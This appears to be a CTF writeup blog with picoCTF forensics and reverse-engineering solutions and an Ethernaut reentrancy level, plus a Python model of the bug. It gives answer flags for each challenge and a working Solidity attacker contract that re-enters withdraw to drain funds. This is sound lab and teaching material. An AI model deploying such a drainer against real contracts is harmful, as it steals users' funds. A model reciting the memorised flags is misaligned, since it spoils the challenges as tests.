26 Sep 2022
PicoCTF 2021 / Forensics / sleuthkit
Description
Download the disk image and use mmls on it to find the size of the Linux partition. Connect to the remote checker service to check your answer and get the flag.
Note: if you are using the webshell, download and extract the disk image into /tmp, not your home directory.
Prerequisite
mmls, which is a tool of sleuthkit used to display the partition layout of a volume system (partition tables).
Writeup
- Download the file.
wget https://artifacts.picoctf.net/c/114/disk.img.gz
- Unzip.
- Display the partition layout of a volume system (partition tables).
- Run nc saturn.picoctf.net 52279 and input 202752.
- Here’s the flag!
picoCTF{mm15_f7w!}
٩(^ᴗ^)۶
26 Sep 2022
PicoCTF 2022 / Reverse Engineering
Description
Can you open this safe?
I forgot the key to my safe but this program is supposed to help me with retrieving the lost key. Can you help me unlock my safe?
Put the password you recover into the picoCTF flag format like:
picoCTF{password}
Writeup
- Download the program SafeOpener.java. There is a method named openSafe that checks whether the password is correct. The string encodedkey is the password, which was converted to a byte array and encoded.
- We can derive the password by decoding the string encodedkey. Add four lines to the openSafe method.

- Execute the program. Here’s the flag!
picoCTF{pl3as3_l3t_m3_1nt0_th3_saf3}
٩(^ᴗ^)۶
26 Sep 2022
PicoCTF 2022 / Forensics
Description
Now you DON’T see me.
This report has some critical data in it, some of which have been redacted correctly, while some were not. Can you find an important key that was not redacted properly?
Prerequisite
pdftotext. You can install it with sudo apt install poppler-utils.
Writeup
- Download the pdf.
wget https://artifacts.picoctf.net/c/264/Financial_Report_for_ABC_Labs.pdf
- Convert pdf to txt.
pdftotext Financial_Report_for_ABC_Labs.pdf
- Grep the flag.
cat Financial_Report_for_ABC_Labs.txt| grep pico
- Here’s the flag!
picoCTF{C4n_Y0u_S33_m3_fully}
٩(^ᴗ^)۶
25 Sep 2022
PicoCTF 2021 / Forensics
Description
Matryoshka dolls are a set of wooden dolls of decreasing size placed one inside another. What’s the final one?
Image: this
Prerequisite
Binwalk, which is a tool for searching a given binary image for embedded files and executable code.
Writeup
- Download the file.
wget https://mercury.picoctf.net/static/205adad23bf9d8303081a0e71c9beab8/dolls.jpg
- Unzip the file
- Using the ls command, we can see that there is one file (dolls.jpg) and one folder (_dolls.jpg.extracted). The second picture (2_c.jpg) is in _dolls.jpg.extracted/base_images.
- Repeat the extraction from step 2 three times.
cd _dolls.jpg.extracted/base_images
binwalk -e 2_c.jpg
cd _2_c.jpg.extracted/base_images
binwalk -e 3_c.jpg
cd _3_c.jpg.extracted/base_images
binwalk -e 4_c.jpg
cd _4_c.jpg.extracted
- Now, if we use the ls command to list all files in the folder, there is a file named flag.txt!
- Here’s our flag. ٩(^ᴗ^)۶
cat flag.txt
# picoCTF{96fac089316e094d41ea046900197662}
24 Sep 2022
Difficulty: 🌕🌕🌕🌑🌑
The goal of this level is for you to steal all the funds from the contract.
Things that might help:
- Untrusted contracts can execute code where you least expect it.
- Fallback methods
- Throw/revert bubbling
- Sometimes the best way to attack a contract is with another contract.
- See the Help page above, section “Beyond the console”
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Reentrance {

  using SafeMath for uint256;
  mapping(address => uint) public balances;

  function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

  function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

  function withdraw(uint _amount) public {
    if(balances[msg.sender] >= _amount) {
      (bool result,) = msg.sender.call{value:_amount}("");
      if(result) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }

  receive() external payable {}
}
Writeup
- Get new instance.
- Get contract’s balance.
await getBalance(contract.address)
// 0.001
- Create a contract.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IReentrance {
  function donate(address _to) external payable;
  function withdraw(uint256 _amount) external;
}

contract ReentrancyAttacker {
  IReentrance levelInstance;
  uint targetValue = 0.001 ether;

  constructor(address _levelInstance) {
    levelInstance = IReentrance(_levelInstance);
  }

  function attack() public {
    levelInstance.withdraw(targetValue);
  }

  fallback() external payable {
    levelInstance.withdraw(targetValue);
  }
}
- Compile and deploy with the Reentrance instance address.
- Donate 0.001 ether to our ReentrancyAttacker contract.
await contract.donate('REENTRANCYATTACKER_CONTRACT_ADDRESS', {value: toWei('0.001')})
- Call the attack function in ReentrancyAttacker.
- Submit instance ξ( ✿>◡❛)
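The ordering bug in withdraw, modelled as an added Python example (not part of the original writeup or the Ethernaut code): it runs the same donate and withdraw sequence against the level's send-then-update ordering and against an update-then-send ordering. The Bank and ReentrantCaller classes, the effects_first switch and the 0.001-ether units are assumptions of the model.

```python
# Added model, not the level's code. Amounts are in units of 0.001 ether.
UINT256 = 2**256

class Bank:
    """Models Reentrance: ether held by the contract plus its balances mapping."""
    def __init__(self, funds, effects_first):
        self.funds = funds                  # ether the contract holds
        self.balances = {}                  # mapping(address => uint)
        self.effects_first = effects_first  # True = hardened ordering (assumption)

    def donate(self, to, value):
        self.funds += value
        self.balances[to] = self.balances.get(to, 0) + value

    def _call_with_value(self, receiver, amount):
        # Like msg.sender.call{value: amount}(""): False if the contract cannot pay
        if self.funds < amount:
            return False
        self.funds -= amount
        receiver.fallback(amount)           # control passes to untrusted code here
        return True

    def withdraw(self, caller, amount):
        if self.balances.get(caller, 0) < amount:
            return
        if self.effects_first:
            self.balances[caller] -= amount          # effect before interaction
            self._call_with_value(caller, amount)
        else:
            self._call_with_value(caller, amount)    # interaction before effect
            # '-=' is unchecked in Solidity 0.6, so the entry wraps mod 2**256
            self.balances[caller] = (self.balances[caller] - amount) % UINT256

class ReentrantCaller:
    """Receiver whose fallback calls withdraw again, as in the writeup."""
    def __init__(self, bank, amount):
        self.bank, self.amount, self.received = bank, amount, 0

    def fallback(self, value):
        self.received += value
        self.bank.withdraw(self, self.amount)

def run(effects_first):
    """Return (contract funds, ether received by caller, caller's balance entry)."""
    bank = Bank(funds=1, effects_first=effects_first)  # level starts with 0.001 ether
    caller = ReentrantCaller(bank, amount=1)
    bank.donate(caller, 1)                             # the writeup's 0.001 ether donation
    bank.withdraw(caller, 1)
    return bank.funds, caller.received, bank.balances[caller]
```

With the level's ordering the contract ends with no funds and the caller's balance entry has wrapped around; with the balance updated before the external call, the re-entered withdraw fails its balance check and the caller only gets back its own donation.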